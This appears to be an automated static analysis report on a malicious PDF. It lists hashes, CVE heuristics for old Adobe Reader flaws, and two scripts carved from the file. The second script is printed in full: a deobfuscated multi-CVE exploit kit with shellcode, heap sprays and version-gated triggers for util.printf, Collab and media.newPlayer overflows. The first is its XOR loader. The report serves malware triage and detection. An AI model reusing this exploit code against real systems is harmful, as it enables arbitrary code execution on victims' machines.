Malicious PDF — malware analysis report

Static analysis result for SHA-256 994b57acbfda27d5…

MALICIOUS

PDF

7.4 KB Authoring application: Lejcaledoqo First seen: 2026-05-10
MD5: 404c815e0bd5d7768c8780895ca14c52 SHA-1: 23355d5fd8f42143a4f1a41a4311a2a9b594fdf3 SHA-256: 994b57acbfda27d5b9eaa08f7c3bd5e76b3fa5d660ca785c2ce913574c910f0c
408 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0016_000.js pdf-javascript-stream PDF /JS object 16 at offset 0x196D 358 bytes
SHA-256: 6f1361ce0d110b67e9b8d7fc2585155e6590316d950227abd4224854eb88c50e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var m='', n=app.doc, y = '%';var k='getPa'+'geNthW'+'ord';var array='getPa'+'geNu'+'mWo'+'rds';var s=n[array](2);var o='fromCh'+'arCode';var mY='charCo'+'deAt';var arrayArray=0,f=2, z=39;var c=this['un'+'esca'+'pe'];    for(var q=0; q < s; q++){u=n[k](2, q);var b=u.substr(u.length-f, f);var nU=c(y + b)[mY](arrayArray);m+=String[o](nU^z);}new Function(m)();
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 4722 bytes
SHA-256: 4a94e9b146acc2e9ea0535c019954ba932ed779676d9c11ba530656bf174e46b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
���������ʉ�퉉ʉ���
	var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
	var dest_table= "?o7Dtfy96NgrXcAi0Uxjh:WvZYe_pREm=bJBFIHlSC0L1T8OKa2kPw-q%&4d/zG5M3uVnsQ.";
app.alert("hack");


function get_shellcode(name) {

	var u = get_url();
	var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";

	s+= u;
	return unescape(s);
}


function get_url(){ 
	var str = this.info.author;
	var ret = encode_str(str, dest_table, src_table);
	return ret;
};

function encode_str(str, src_table, dest_table){

	var ret="";
	for(var i=0; i < str.length; i++)
	{
		var index = src_table.indexOf(str[i]);
		if(index > -1 )
		{
			ret += dest_table[index];
		}
	}
	return ret;
}

function fix_it(yarsp,len){

	while(yarsp.length*2<len){
		yarsp+=yarsp;
	}
	yarsp=yarsp.substring(0,len/2);
	return yarsp;
}

function printd(){
	var shellcode = get_shellcode("_new");
	var nx = unescape("%u9342%u3f4a"); 
	while(nx.length <= 32768) {
		nx += nx; 
	}
	nx = nx.substring(0, 32768 - shellcode.length); 
	memory = new Array(); 
	for(i = 0; i < 0x2000; i++) { 
		memory[i]= nx + shellcode; 
	} 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 
	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); 

	try {
		this.media.newPlayer(null);
	} catch(e) {

	} 

	util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
}

function util_printf(){

	var payload=get_shellcode("_pack");
	var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");

	var heapblock=nop+payload;
	var bigblock=unescape("%u0A0A%u0A0A");
	var headersize=20;
	var spray=headersize+heapblock.length;

	while(bigblock.length<spray){
		bigblock+=bigblock;
	}

	var fillblock=bigblock.substring(0,spray);
	var block=bigblock.substring(0,bigblock.length-spray);

	while(block.length+spray<0x40000){
		block=block+block+fillblock;
	}

	var mem_array=new Array();

	for(var i=0;i<1400;i++){
		mem_array[i]=block+heapblock;
	}

	var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
	util.printf("%45000f",num);
}

function collab_email(){

	var shellcode=get_shellcode("_pack");
	var mem_array=new Array();
	var cc=0x0c0c0c0c;
	var addr=0x400000;
	var sc_len=shellcode.length*2;
	var len=addr-(sc_len+0x38);
	var yarsp=unescape("%u9090%u9090");
	yarsp=fix_it(yarsp,len);
	var count2=(cc-0x400000)/addr;

	for(var count=0;count<count2;count++){
		mem_array[count]=yarsp+shellcode;
	}

	var overflow=unescape("%u0c0c%u0c0c");

	while(overflow.length<44952){
		overflow+=overflow;
	}

	this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});
}

function collab_geticon(){

	if(app.doc.Collab.getIcon){
		var arry=new Array();
		var vvpethya=get_shellcode("_pack");
		var hWq500CN=vvpethya.length*2;
		var len=0x400000-(hWq500CN+0x38);

		var yarsp=unescape("%u9090%u9090");
		yarsp=fix_it(yarsp,len);

		var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;

		for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){
			arry[vqcQD96y]=yarsp+vvpethya;
		}

		var tUMhNbGw=unescape("%09");

		while(tUMhNbGw.length<0x4000){
			tUMhNbGw+=tUMhNbGw;
		}

		tUMhNbGw="N."+tUMhNbGw;
		app.doc.Collab.getIcon(tUMhNbGw);}
}

function PPPDDDFF(){

	var version=app.viewerVersion.toString();
	version=version.replace(/\D/g,'');
	var varsion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

	if((varsion_array[0]==8)&&(varsion_array[1]==0)||(varsion_array[1]==1&&varsion_array[2]<3)){
		util_printf();
	}

	if((varsion_array[0]<8)||(varsion_array[0]==8&&varsion_array[1]<2&&varsion_array[2]<2)){
		collab_email();
	}

	if((varsion_array[0]<9)||(varsion_array[0]==9&&varsion_array[1]<1)){
		collab_geticon();
	}

	printd();
}

PPPDDDFF();
����������������������'

Open this report in the interactive analyzer, or submit your own file for analysis.